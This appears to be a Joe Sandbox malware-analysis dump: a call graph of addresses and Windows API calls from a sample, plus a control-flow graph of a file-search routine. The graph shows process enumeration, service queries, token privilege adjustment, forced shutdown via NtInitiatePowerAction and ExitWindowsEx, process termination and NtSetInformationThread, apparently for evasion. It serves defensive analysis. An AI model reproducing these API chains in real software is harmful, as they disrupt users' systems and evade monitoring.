92063 6c992cc8 37 API calls __cftoe 92054->92063 92055->92048 92064 6c97ef40 18 API calls __cftoe 92055->92064 92065 6c9931b6 92057->92065 92060->92048 92061->92052 92062->92054 92063->92055 92064->92048 92066 6c9931c2 __wsopen_s 92065->92066 92067 6c9931c9 92066->92067 92068 6c9931f4 92066->92068 92083 6c97ef40 18 API calls __cftoe 92067->92083 92074 6c992e1e 92068->92074 92073 6c992e19 92073->92015 92085 6c97f4eb 92074->92085 92079 6c992e54 92081 6c992e86 92079->92081 92125 6c9835db HeapFree GetLastError __dosmaperr 92079->92125 92084 6c99324b LeaveCriticalSection __wsopen_s 92081->92084 92083->92073 92084->92073 92126 6c97ab0b 92085->92126 92088 6c97f50f 92090 6c97ac16 92088->92090 92135 6c97ac6e 92090->92135 92092 6c97ac2e 92092->92079 92093 6c992e8c 92092->92093 92150 6c99330c 92093->92150 92099 6c992fb2 GetFileType 92102 6c992fbd GetLastError 92099->92102 92103 6c993004 92099->92103 92100 6c992ebe __dosmaperr 92100->92079 92101 6c992f87 GetLastError 92101->92100 92179 6c97e812 __dosmaperr 92102->92179 92180 6c9905d0 SetStdHandle __dosmaperr __wsopen_s 92103->92180 92104 6c992f35 92104->92099 92104->92101 92178 6c993277 CreateFileW 92104->92178 92106 6c992fcb CloseHandle 92106->92100 92122 6c992ff4 92106->92122 92109 6c992f7a 92109->92099 92109->92101 92110 6c993025 92111 6c993071 92110->92111 92181 6c993486 70 API calls 2 library calls 92110->92181 92115 6c993078 92111->92115 92195 6c993530 70 API calls 2 library calls 92111->92195 92114 6c9930a6 92114->92115 92116 6c9930b4 92114->92116 92182 6c98a745 92115->92182 92116->92100 92118 6c993130 CloseHandle 92116->92118 92196 6c993277 CreateFileW 92118->92196 92120 6c99315b 92121 6c993165 GetLastError 92120->92121 92120->92122 92123 6c993171 __dosmaperr 92121->92123 92122->92100 92197 6c99053f SetStdHandle __dosmaperr __wsopen_s 92123->92197 92125->92081 92127 6c97ab22 92126->92127 92128 6c97ab2b 92126->92128 92127->92088 92134 6c9857f5 5 API calls std::_Lockit::_Lockit 92127->92134 92128->92127 92129 6c9837d2 __Getctype 37 API calls 92128->92129 92130 6c97ab4b 92129->92130 92131 6c983d48 __Getctype 37 API calls 92130->92131 92132 6c97ab61 92131->92132 92133 6c983d75 __cftoe 37 API calls 92132->92133 92133->92127 92134->92088 92136 6c97ac96 92135->92136 92137 6c97ac7c 92135->92137 92139 6c97ac9d 92136->92139 92140 6c97acbc 92136->92140 92138 6c97abfc __wsopen_s HeapFree GetLastError 92137->92138 92141 6c97ac86 __dosmaperr 92138->92141 92139->92141 92143 6c97abbd __wsopen_s HeapFree GetLastError 92139->92143 92142 6c983663 __fassign MultiByteToWideChar 92140->92142 92141->92092 92144 6c97accb 92142->92144 92143->92141 92145 6c97acd2 GetLastError 92144->92145 92146 6c97abbd __wsopen_s HeapFree GetLastError 92144->92146 92148 6c97acf8 92144->92148 92145->92141 92146->92148 92147 6c983663 __fassign MultiByteToWideChar 92149 6c97ad0f 92147->92149 92148->92141 92148->92147 92149->92141 92149->92145 92151 6c993347 92150->92151 92153 6c99332d 92150->92153 92152 6c99329c __wsopen_s 18 API calls 92151->92152 92156 6c99337f 92152->92156 92153->92151 92154 6c97ef40 __cftoe 18 API calls 92153->92154 92154->92151 92155 6c9933ae 92157 6c994731 __wsopen_s 18 API calls 92155->92157 92163 6c992ea9 92155->92163 92156->92155 92160 6c97ef40 __cftoe 18 API calls 92156->92160 92158 6c9933fc 92157->92158 92159 6c993479 92158->92159 92158->92163 92161 6c97ef6d __Getctype 11 API calls 92159->92161 92160->92155 92162 6c993485 92161->92162 92163->92100 92164 6c99042c 92163->92164 92165 6c990438 __wsopen_s 92164->92165 92166 6c97f1bf std::_Lockit::_Lockit EnterCriticalSection 92165->92166 92168 6c99043f 92166->92168 92167 6c990536 __wsopen_s LeaveCriticalSection 92170 6c9904a6 92167->92170 92169 6c990464 92168->92169 92173 6c9904d3 EnterCriticalSection 92168->92173 92176 6c990486 92168->92176 92171 6c990662 __wsopen_s 11 API calls 92169->92171 92170->92100 92177 6c993277 CreateFileW 92170->92177 92172 6c990469 92171->92172 92175 6c9907b0 __wsopen_s EnterCriticalSection 92172->92175 92172->92176 92174 6c9904e0 LeaveCriticalSection 92173->92174 92173->92176 92174->92168 92175->92176 92176->92167 92177->92104 92178->92109 92179->92106 92180->92110 92181->92111 92183 6c9903c2 __wsopen_s 18 API calls 92182->92183 92186 6c98a755 92183->92186 92184 6c98a75b 92185 6c99053f __wsopen_s SetStdHandle 92184->92185 92189 6c98a7b3 __dosmaperr 92185->92189 92186->92184 92187 6c9903c2 __wsopen_s 18 API calls 92186->92187 92194 6c98a78d 92186->92194 92190 6c98a784 92187->92190 92188 6c9903c2 __wsopen_s 18 API calls 92191 6c98a799 CloseHandle 92188->92191 92189->92100 92192 6c9903c2 __wsopen_s 18 API calls 92190->92192 92191->92184 92193 6c98a7a5 GetLastError 92191->92193 92192->92194 92193->92184 92194->92184 92194->92188 92195->92114 92196->92120 92197->92122 92198->91998 92200 6c97f9de 92199->92200 92201 6c97f9c9 92199->92201 92205 6c97f9d9 92200->92205 92215 6c97fad9 92200->92215 92237 6c97ef40 18 API calls __cftoe 92201->92237 92205->92000 92209 6c97fa01 92230 6c98a6b8 92209->92230 92211 6c97fa07 92211->92205 92238 6c9835db HeapFree GetLastError __dosmaperr 92211->92238 92213->92002 92214->92002 92216 6c97faf1 92215->92216 92217 6c97f9f3 92215->92217 92216->92217 92218 6c988a80 18 API calls 92216->92218 92221 6c98755e 92217->92221 92219 6c97fb0f 92218->92219 92239 6c98a98c 92219->92239 92222 6c97f9fb 92221->92222 92223 6c987575 92221->92223 92225 6c988a80 92222->92225 92223->92222 92327 6c9835db HeapFree GetLastError __dosmaperr 92223->92327 92226 6c988a8c 92225->92226 92227 6c988aa1 92225->92227 92328 6c97ef40 18 API calls __cftoe 92226->92328 92227->92209 92229 6c988a9c 92229->92209 92231 6c98a6de 92230->92231 92232 6c98a6c9 __dosmaperr 92230->92232 92233 6c98a705 92231->92233 92235 6c98a727 __dosmaperr 92231->92235 92232->92211 92329 6c98a7e1 92233->92329 92337 6c97ef40 18 API calls __cftoe 92235->92337 92237->92205 92238->92205 92240 6c98a998 __wsopen_s 92239->92240 92241 6c98a9a0 __dosmaperr 92240->92241 92242 6c98a9ea 92240->92242 92244 6c98aa53 __dosmaperr 92240->92244 92241->92217 92250 6c9907b0 EnterCriticalSection 92242->92250 92280 6c97ef40 18 API calls __cftoe 92244->92280 92245 6c98a9f0 92248 6c98aa0c __dosmaperr 92245->92248 92251 6c98aa7e 92245->92251 92279 6c98aa4b LeaveCriticalSection __wsopen_s 92248->92279 92250->92245 92252 6c98aaa0 92251->92252 92278 6c98aabc __dosmaperr 92251->92278 92253 6c98aaf4 92252->92253 92255 6c98aaa4 __dosmaperr 92252->92255 92254 6c98ab07 92253->92254 92289 6c989a89 20 API calls __wsopen_s 92253->92289 92281 6c98ac60 92254->92281 92288 6c97ef40 18 API calls __cftoe 92255->92288 92260 6c98ab5c 92262 6c98ab70 92260->92262 92263 6c98abb5 WriteFile 92260->92263 92261 6c98ab1d 92264 6c98ab21 92261->92264 92265 6c98ab46 92261->92265 92268 6c98ab7b 92262->92268 92269 6c98aba5 92262->92269 92266 6c98abd9 GetLastError 92263->92266 92263->92278 92264->92278 92290 6c98b07b 6 API calls __wsopen_s 92264->92290 92291 6c98acd1 43 API calls 5 library calls 92265->92291 92266->92278 92271 6c98ab80 92268->92271 92272 6c98ab95 92268->92272 92294 6c98b0e3 7 API calls 2 library calls 92269->92294 92275 6c98ab85 92271->92275 92271->92278 92293 6c98b2a7 8 API calls 3 library calls 92272->92293 92274 6c98ab93 92274->92278 92292 6c98b1be 7 API calls 2 library calls 92275->92292 92278->92248 92279->92241 92280->92241 92295 6c990805 92281->92295 92283 6c98ab18 92283->92260 92283->92261 92284 6c98ac71 92284->92283 92300 6c9837d2 GetLastError 92284->92300 92287 6c98acae GetConsoleMode 92287->92283 92288->92278 92289->92254 92290->92278 92291->92278 92292->92274 92293->92274 92294->92274 92296 6c99081f 92295->92296 92297 6c990812 92295->92297 92298 6c99082b 92296->92298 92299 6c97ef40 __cftoe 18 API calls 92296->92299 92297->92284 92298->92284 92299->92297 92301 6c9837e9 92300->92301 92302 6c9837ef 92300->92302 92303 6c985943 __Getctype 6 API calls 92301->92303 92304 6c985982 __Getctype 6 API calls 92302->92304 92306 6c9837f5 SetLastError 92302->92306 92303->92302 92305 6c98380d 92304->92305 92305->92306 92307 6c983811 92305->92307 92313 6c983889 92306->92313 92314 6c983883 92306->92314 92308 6c986005 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 92307->92308 92310 6c98381d 92308->92310 92311 6c98383c 92310->92311 92312 6c983825 92310->92312 92316 6c985982 __Getctype 6 API calls 92311->92316 92317 6c985982 __Getctype 6 API calls 92312->92317 92315 6c97f8e9 __Getctype 35 API calls 92313->92315 92314->92283 92314->92287 92318 6c98388e 92315->92318 92319 6c983848 92316->92319 92320 6c983833 92317->92320 92321 6c98384c 92319->92321 92322 6c98385d 92319->92322 92323 6c9835db _free HeapFree GetLastError 92320->92323 92324 6c985982 __Getctype 6 API calls 92321->92324 92326 6c9835db _free HeapFree GetLastError 92322->92326 92325 6c983839 92323->92325 92324->92320 92325->92306 92326->92325 92327->92222 92328->92229 92330 6c98a7ed __wsopen_s 92329->92330 92338 6c9907b0 EnterCriticalSection 92330->92338 92332 6c98a7fb 92333 6c98a745 __wsopen_s 21 API calls 92332->92333 92334 6c98a828 92332->92334 92333->92334 92339 6c98a861 LeaveCriticalSection __wsopen_s 92334->92339 92336 6c98a84a 92336->92232 92337->92232 92338->92332 92339->92336 92340->91880 92341->91885 92342->91880 92343->91880 92344->91880 92346 6c84022e 92345->92346 92347 6c8170c4 92346->92347 92352 6c9805fb 92346->92352 92347->91893 92349->91894 92350->91896 92351->91898 92353 6c980609 92352->92353 92354 6c980626 92352->92354 92353->92354 92355 6c98062a 92353->92355 92356 6c980616 92353->92356 92354->92346 92360 6c980822 92355->92360 92368 6c97ef40 18 API calls __cftoe 92356->92368 92361 6c98082e __wsopen_s 92360->92361 92369 6c97b3c9 EnterCriticalSection 92361->92369 92363 6c98083c 92370 6c9807df 92363->92370 92367 6c98065c 92367->92346 92368->92354 92369->92363 92378 6c9873c6 92370->92378 92376 6c980819 92377 6c980871 LeaveCriticalSection 92376->92377 92377->92367 92379 6c988a80 18 API calls 92378->92379 92380 6c9873d7 92379->92380 92381 6c990805 __wsopen_s 18 API calls 92380->92381 92382 6c9873dd __wsopen_s 92381->92382 92383 6c9807f3 92382->92383 92395 6c9835db HeapFree GetLastError __dosmaperr 92382->92395 92385 6c98065e 92383->92385 92387 6c980670 92385->92387 92389 6c98068e 92385->92389 92386 6c98067e 92396 6c97ef40 18 API calls __cftoe 92386->92396 92387->92386 92387->92389 92392 6c9806a6 _Yarn 92387->92392 92394 6c987479 62 API calls 92389->92394 92390 6c97fad9 62 API calls 92390->92392 92391 6c988a80 18 API calls 92391->92392 92392->92389 92392->92390 92392->92391 92393 6c98a98c __wsopen_s 62 API calls 92392->92393 92393->92392 92394->92376 92395->92383 92396->92389 92397 6c80f8a3 92399 6c80f887 92397->92399 92398 6c8102ac GetCurrentProcess TerminateProcess 92400 6c8102ca 92398->92400 92399->92398 92401 6c97dd5f 92402 6c97dd6b __wsopen_s 92401->92402 92403 6c97dd72 GetLastError ExitThread 92402->92403 92404 6c97dd7f 92402->92404 92405 6c9837d2 __Getctype 37 API calls 92404->92405 92406 6c97dd84 92405->92406 92413 6c988b86 92406->92413 92409 6c97dd9b 92419 6c97dcca 16 API calls 2 library calls 92409->92419 92412 6c97ddbd 92414 6c988b98 GetPEB 92413->92414 92417 6c97dd8f 92413->92417 92415 6c988bab 92414->92415 92414->92417 92420 6c985c38 5 API calls std::_Lockit::_Lockit 92415->92420 92417->92409 92418 6c985b8f 5 API calls std::_Lockit::_Lockit 92417->92418 92418->92409 92419->92412 92420->92417 92421 6c98b8f3 92422 6c98b91d 92421->92422 92423 6c98b905 __dosmaperr 92421->92423 92422->92423 92424 6c98b968 __dosmaperr 92422->92424 92425 6c98b997 92422->92425 92463 6c97ef40 18 API calls __cftoe 92424->92463 92427 6c98b9b0 92425->92427 92428 6c98ba07 __wsopen_s 92425->92428 92429 6c98b9cb __dosmaperr 92425->92429 92427->92429 92448 6c98b9b5 92427->92448 92457 6c9835db HeapFree GetLastError __dosmaperr 92428->92457 92456 6c97ef40 18 API calls __cftoe 92429->92456 92430 6c990805 __wsopen_s 18 API calls 92431 6c98bb5e 92430->92431 92433 6c98bbd4 92431->92433 92436 6c98bb77 GetConsoleMode 92431->92436 92438 6c98bbd8 ReadFile 92433->92438 92434 6c98ba27 92458 6c9835db HeapFree GetLastError __dosmaperr 92434->92458 92436->92433 92441 6c98bb88 92436->92441 92439 6c98bc4c GetLastError 92438->92439 92440 6c98bbf2 92438->92440 92452 6c98b9e2 __dosmaperr __wsopen_s 92439->92452 92440->92439 92443 6c98bbc9 92440->92443 92441->92438 92444 6c98bb8e ReadConsoleW 92441->92444 92442 6c98ba2e 92442->92452 92459 6c989a89 20 API calls __wsopen_s 92442->92459 92449 6c98bc2e 92443->92449 92450 6c98bc17 92443->92450 92443->92452 92444->92443 92446 6c98bbaa GetLastError 92444->92446 92446->92452 92448->92430 92449->92452 92453 6c98bc45 92449->92453 92461 6c98bd1e 23 API calls 3 library calls 92450->92461 92460 6c9835db HeapFree GetLastError __dosmaperr 92452->92460 92462 6c98bfd6 21 API calls __wsopen_s 92453->92462 92455 6c98bc4a 92455->92452 92456->92452 92457->92434 92458->92442 92459->92448 92460->92423 92461->92452 92462->92455 92463->92423 92464 6c7f4b53 92465 6c975863 std::_Facet_Register 4 API calls 92464->92465 92466 6c7f4b5c _Yarn 92465->92466 92467 6c9698b0 2 API calls 92466->92467 92472 6c7f4bae std::ios_base::_Ios_base_dtor 92467->92472 92468 6c81639e 92668 6c97ef50 18 API calls 2 library calls 92468->92668 92470 6c7f4cff 92471 6c7f5164 CreateFileA CloseHandle 92476 6c7f51ec 92471->92476 92472->92468 92472->92470 92472->92471 92473 6c80245a _Yarn _strlen 92472->92473 92473->92468 92475 6c9698b0 2 API calls 92473->92475 92489 6c802a83 std::ios_base::_Ios_base_dtor 92475->92489 92622 6c973f30 OpenSCManagerA 92476->92622 92478 6c7ffc00 92660 6c974050 CreateToolhelp32Snapshot 92478->92660 92481 6c975863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 92518 6c7f5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 92481->92518 92483 6c8037d0 Sleep 92528 6c8037e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 92483->92528 92484 6c9698b0 2 API calls 92484->92518 92485 6c8163b2 92669 6c7f15e0 18 API calls std::ios_base::_Ios_base_dtor 92485->92669 92486 6c974050 4 API calls 92503 6c80053a 92486->92503 92487 6c974050 4 API calls 92513 6c8012e2 92487->92513 92489->92468 92626 6c95eff0 92489->92626 92490 6c8164f8 92491 6c7fffe3 92491->92486 92497 6c800abc 92491->92497 92492 6c816ba0 104 API calls 92492->92518 92493 6c816e60 32 API calls 92493->92518 92495 6c817090 77 API calls 92495->92518 92496 6c974050 4 API calls 92496->92497 92497->92473 92497->92487 92498 6c974050 4 API calls 92516 6c801dd9 92498->92516 92499 6c80211c 92499->92473 92501 6c80241a 92499->92501 92504 6c95eff0 11 API calls 92501->92504 92502 6c9698b0 2 API calls 92502->92528 92503->92496 92503->92497 92506 6c80244d 92504->92506 92505 6c7f6722 92636 6c970900 25 API calls 4 library calls 92505->92636 92666 6c974b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 92506->92666 92508 6c802452 Sleep 92508->92473 92509 6c8016ac 92510 6c7f6162 92512 6c7f740b 92637 6c973e00 CreateProcessA 92512->92637 92513->92498 92513->92499 92513->92509 92514 6c974050 4 API calls 92514->92499 92515 6c816ba0 104 API calls 92515->92528 92516->92499 92516->92514 92517 6c816e60 32 API calls 92517->92528 92518->92468 92518->92478 92518->92481 92518->92484 92518->92492 92518->92493 92518->92495 92518->92505 92518->92510 92635 6c83e010 67 API calls 92518->92635 92519 6c817090 77 API calls 92519->92528 92521 6c7f775a _strlen 92521->92468 92522 6c7f7ba9 92521->92522 92523 6c7f7b92 92521->92523 92526 6c7f7b43 _Yarn 92521->92526 92525 6c975863 std::_Facet_Register 4 API calls 92522->92525 92524 6c975863 std::_Facet_Register 4 API calls 92523->92524 92524->92526 92525->92526 92527 6c9698b0 2 API calls 92526->92527 92529 6c7f7be7 std::ios_base::_Ios_base_dtor 92527->92529 92528->92468 92528->92502 92528->92515 92528->92517 92528->92519 92667 6c83e010 67 API calls 92528->92667 92529->92468 92530 6c973e00 4 API calls 92529->92530 92537 6c7f962c _strlen 92529->92537 92543 6c7f8387 92529->92543 92540 6c7f8a07 92530->92540 92531 6c7f9d7f 92534 6c975863 std::_Facet_Register 4 API calls 92531->92534 92532 6c7f9d68 92533 6c975863 std::_Facet_Register 4 API calls 92532->92533 92535 6c7f9d18 _Yarn 92533->92535 92534->92535 92536 6c9698b0 2 API calls 92535->92536 92538 6c7f9dbd std::ios_base::_Ios_base_dtor 92536->92538 92537->92468 92537->92531 92537->92532 92537->92535 92538->92468 92542 6c973e00 4 API calls 92538->92542 92620 6c7fe8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 92538->92620 92539 6c973e00 4 API calls 92541 6c7f9120 92539->92541 92540->92539 92544 6c973e00 4 API calls 92541->92544 92552 6c7fa215 _strlen 92542->92552 92545 6c7f9624 92544->92545 92641 6c974b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 92545->92641 92546 6c975863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 92546->92620 92548 6c9698b0 2 API calls 92548->92620 92549 6c7fed02 Sleep 92569 6c7fe8c1 92549->92569 92550 6c7ff7b1 92659 6c974b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 92550->92659 92552->92468 92554 6c7fa9bb 92552->92554 92555 6c7fa9a4 92552->92555 92564 6c7fa953 _Yarn _strlen 92552->92564 92553 6c7fe8dd GetCurrentProcess TerminateProcess 92553->92620 92557 6c975863 std::_Facet_Register 4 API calls 92554->92557 92556 6c975863 std::_Facet_Register 4 API calls 92555->92556 92556->92564 92557->92564 92558 6c973e00 4 API calls 92558->92569 92559 6c7ffbb8 92560 6c7ffbe8 ExitWindowsEx Sleep 92559->92560 92560->92478 92561 6c7ff7c0 92561->92559 92562 6c7fb009 92566 6c975863 std::_Facet_Register 4 API calls 92562->92566 92563 6c7faff0 92565 6c975863 std::_Facet_Register 4 API calls 92563->92565 92564->92485 92564->92562 92564->92563 92567 6c7fafa0 _Yarn 92564->92567 92565->92567 92566->92567 92642 6c974780 92567->92642 92569->92553 92569->92558 92569->92620 92570 6c7fb059 std::ios_base::_Ios_base_dtor _strlen 92570->92468 92571 6c7fb42c 92570->92571 92572 6c7fb443 92570->92572 92575 6c7fb3da _Yarn _strlen 92570->92575 92573 6c975863 std::_Facet_Register 4 API calls 92571->92573 92574 6c975863 std::_Facet_Register 4 API calls 92572->92574 92573->92575 92574->92575 92575->92485 92576 6c7fb79e 92575->92576 92577 6c7fb7b7 92575->92577 92580 6c7fb751 _Yarn 92575->92580 92578 6c975863 std::_Facet_Register 4 API calls 92576->92578 92579 6c975863 std::_Facet_Register 4 API calls 92577->92579 92578->92580 92579->92580 92581 6c974780 104 API calls 92580->92581 92582 6c7fb804 std::ios_base::_Ios_base_dtor _strlen 92581->92582 92582->92468 92583 6c7fbc0f 92582->92583 92584 6c7fbc26 92582->92584 92587 6c7fbbbd _Yarn _strlen 92582->92587 92586 6c975863 std::_Facet_Register 4 API calls 92583->92586 92585 6c975863 std::_Facet_Register 4 API calls 92584->92585 92585->92587 92586->92587 92587->92485 92588 6c7fc08e 92587->92588 92589 6c7fc075 92587->92589 92592 6c7fc028 _Yarn 92587->92592 92591 6c975863 std::_Facet_Register 4 API calls 92588->92591 92590 6c975863 std::_Facet_Register 4 API calls 92589->92590 92590->92592 92591->92592 92593 6c974780 104 API calls 92592->92593 92598 6c7fc0db std::ios_base::_Ios_base_dtor _strlen 92593->92598 92594 6c7fc7bc 92597 6c975863 std::_Facet_Register 4 API calls 92594->92597 92595 6c7fc7a5 92596 6c975863 std::_Facet_Register 4 API calls 92595->92596 92605 6c7fc753 _Yarn _strlen 92596->92605 92597->92605 92598->92468 92598->92594 92598->92595 92598->92605 92599 6c7fd3ed 92601 6c975863 std::_Facet_Register 4 API calls 92599->92601 92600 6c7fd406 92602 6c975863 std::_Facet_Register 4 API calls 92600->92602 92603 6c7fd39a _Yarn 92601->92603 92602->92603 92604 6c974780 104 API calls 92603->92604 92606 6c7fd458 std::ios_base::_Ios_base_dtor _strlen 92604->92606 92605->92485 92605->92599 92605->92600 92605->92603 92611 6c7fcb2f 92605->92611 92606->92468 92607 6c7fd8bb 92606->92607 92608 6c7fd8a4 92606->92608 92612 6c7fd852 _Yarn _strlen 92606->92612 92610 6c975863 std::_Facet_Register 4 API calls 92607->92610 92609 6c975863 std::_Facet_Register 4 API calls 92608->92609 92609->92612 92610->92612 92612->92485 92613 6c7fdccf 92612->92613 92614 6c7fdcb6 92612->92614 92617 6c7fdc69 _Yarn 92612->92617 92616 6c975863 std::_Facet_Register 4 API calls 92613->92616 92615 6c975863 std::_Facet_Register 4 API calls 92614->92615 92615->92617 92616->92617 92618 6c974780 104 API calls 92617->92618 92621 6c7fdd1c std::ios_base::_Ios_base_dtor 92618->92621 92619 6c973e00 4 API calls 92619->92620 92620->92468 92620->92546 92620->92548 92620->92549 92620->92550 92621->92468 92621->92619 92624 6c973f66 92622->92624 92623 6c973ffb OpenServiceA 92623->92624 92624->92623 92625 6c974042 92624->92625 92625->92518 92632 6c95f003 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 92626->92632 92627 6c961bac CloseHandle 92627->92632 92628 6c961a40 CloseHandle 92628->92632 92630 6c9610d2 CloseHandle 92630->92632 92631 6c8037cb 92634 6c974b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 92631->92634 92632->92627 92632->92628 92632->92630 92632->92631 92633 6c94c310 ReadFile WriteFile WriteFile WriteFile 92632->92633 92670 6c94b750 92632->92670 92633->92632 92634->92483 92635->92518 92636->92512 92638 6c973e90 92637->92638 92639 6c973ed0 WaitForSingleObject CloseHandle CloseHandle 92638->92639 92640 6c973ec4 92638->92640 92639->92638 92640->92521 92641->92537 92643 6c9747d7 92642->92643 92681 6c974e10 92643->92681 92645 6c9747e8 92646 6c816ba0 104 API calls 92645->92646 92651 6c97480c 92646->92651 92647 6c974887 92733 6c83e010 67 API calls 92647->92733 92649 6c9748bf std::ios_base::_Ios_base_dtor 92734 6c83e010 67 API calls 92649->92734 92651->92647 92653 6c974874 92651->92653 92700 6c975160 92651->92700 92708 6c852590 92651->92708 92718 6c9749b0 92653->92718 92654 6c974902 std::ios_base::_Ios_base_dtor 92654->92570 92657 6c97487c 92658 6c817090 77 API calls 92657->92658 92658->92647 92659->92561 92661 6c974087 std::locale::_Setgloballocale 92660->92661 92662 6c974195 Process32NextW 92661->92662 92663 6c9741c7 92661->92663 92664 6c9740e4 CloseHandle 92661->92664 92665 6c974160 Process32FirstW 92661->92665 92662->92661 92663->92491 92664->92661 92665->92661 92666->92508 92667->92528 92669->92490 92671 6c94b763 _Yarn __wsopen_s std::locale::_Setgloballocale 92670->92671 92672 6c94c2b0 92671->92672 92674 6c94b900 CreateFileA 92671->92674 92675 6c94a500 92671->92675 92672->92632 92674->92671 92676 6c94a513 __wsopen_s std::locale::_Setgloballocale 92675->92676 92677 6c94b0ef WriteFile 92676->92677 92678 6c94a7f2 WriteFile 92676->92678 92679 6c94b735 92676->92679 92680 6c94ab96 ReadFile 92676->92680 92677->92676 92678->92676 92679->92671 92680->92676 92682 6c974e45 92681->92682 92683 6c842020 52 API calls 92682->92683 92684 6c974ee6 92683->92684 92685 6c975863 std::_Facet_Register 4 API calls 92684->92685 92686 6c974f1e 92685->92686 92687 6c976147 43 API calls 92686->92687 92688 6c974f32 92687->92688 92689 6c841d90 89 API calls 92688->92689 92690 6c974fdb 92689->92690 92691 6c97500c 92690->92691 92735 6c842250 30 API calls 92690->92735 92691->92645 92693 6c975046 92736 6c8426e0 24 API calls 4 library calls 92693->92736 92695 6c975058 92737 6c978199 RaiseException 92695->92737 92697 6c97506d 92738 6c83e010 67 API calls 92697->92738 92699 6c97507f 92699->92645 92701 6c9751ad 92700->92701 92739 6c9753c0 92701->92739 92703 6c97529c 92703->92651 92705 6c9751c5 92705->92703 92757 6c842250 30 API calls 92705->92757 92758 6c8426e0 24 API calls 4 library calls 92705->92758 92759 6c978199 RaiseException 92705->92759 92709 6c8525cf 92708->92709 92712 6c8525e3 92709->92712 92768 6c843560 32 API calls std::_Xinvalid_argument 92709->92768 92715 6c85269e 92712->92715 92770 6c842250 30 API calls 92712->92770 92771 6c8426e0 24 API calls 4 library calls 92712->92771 92772 6c978199 RaiseException 92712->92772 92714 6c8526b1 92714->92651 92715->92714 92769 6c8437e0 32 API calls std::_Xinvalid_argument 92715->92769 92719 6c9749be 92718->92719 92723 6c9749f1 92718->92723 92721 6c8401f0 64 API calls 92719->92721 92720 6c974aa3 92720->92657 92722 6c9749e4 92721->92722 92724 6c97f938 67 API calls 92722->92724 92723->92720 92773 6c842250 30 API calls 92723->92773 92724->92723 92726 6c974ace 92774 6c842340 24 API calls 92726->92774 92728 6c974ade 92775 6c978199 RaiseException 92728->92775 92730 6c974ae9 92776 6c83e010 67 API calls 92730->92776 92732 6c974b42 std::ios_base::_Ios_base_dtor 92732->92657 92733->92649 92734->92654 92735->92693 92736->92695 92737->92697 92738->92699 92740 6c9753fc 92739->92740 92741 6c975428 92739->92741 92742 6c975421 92740->92742 92762 6c842250 30 API calls 92740->92762 92747 6c975439 92741->92747 92760 6c843560 32 API calls std::_Xinvalid_argument 92741->92760 92742->92705 92745 6c975608 92763 6c842340 24 API calls 92745->92763 92747->92742 92761 6c842f60 42 API calls 4 library calls 92747->92761 92748 6c975617 92764 6c978199 RaiseException 92748->92764 92752 6c975647 92766 6c842340 24 API calls 92752->92766 92754 6c97565d 92767 6c978199 RaiseException 92754->92767 92756 6c975473 92756->92742 92765 6c842250 30 API calls 92756->92765 92757->92705 92758->92705 92759->92705 92760->92747 92761->92756 92762->92745 92763->92748 92764->92756 92765->92752 92766->92754 92767->92742 92768->92712 92769->92714 92770->92712 92771->92712 92772->92712 92773->92726 92774->92728 92775->92730 92776->92732 92777 6c7f3d62 92779 6c7f3bc0 92777->92779 92778 6c7f3e8a GetCurrentThread NtSetInformationThread 92780 6c7f3eea 92778->92780 92779->92778
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen
                                                                                                                • String ID: HR^
                                                                                                                • API String ID: 4218353326-1341859651
                                                                                                                • Opcode ID: 783133d33f1c24634eecbf6d23a0225591af883a513e144592e484fed0646056
                                                                                                                • Instruction ID: d698d796cc9b6a984cb37a1cd0acbbb7bb5d283917afd2f141a542fcb7facc9a
                                                                                                                • Opcode Fuzzy Hash: 783133d33f1c24634eecbf6d23a0225591af883a513e144592e484fed0646056
                                                                                                                • Instruction Fuzzy Hash: 25741531644B028FC728CF28C9D0A95B7E3FF95318B198A6DC0A68BB55E774B54BCB50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4635 6c9698b0-6c9698c2 4636 6c9698c6-6c9698f3 FindFirstFileA 4635->4636 4637 6c9698c4 4635->4637 4638 6c96991c-6c969925 4636->4638 4637->4636 4639 6c969927-6c96992c 4638->4639 4640 6c969940-6c969945 4638->4640 4641 6c969900-6c96991a 4639->4641 4642 6c96992e-6c969933 4639->4642 4643 6c969947 4640->4643 4644 6c969959-6c96995e 4640->4644 4641->4638 4642->4638 4645 6c969935-6c969939 4642->4645 4646 6c969949-6c969957 FindClose 4643->4646 4644->4638 4647 6c969960-6c96996c 4644->4647 4645->4646 4646->4638
                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 6C9698CC
                                                                                                                • FindClose.KERNEL32(000000FF), ref: 6C969949
                                                                                                                Strings
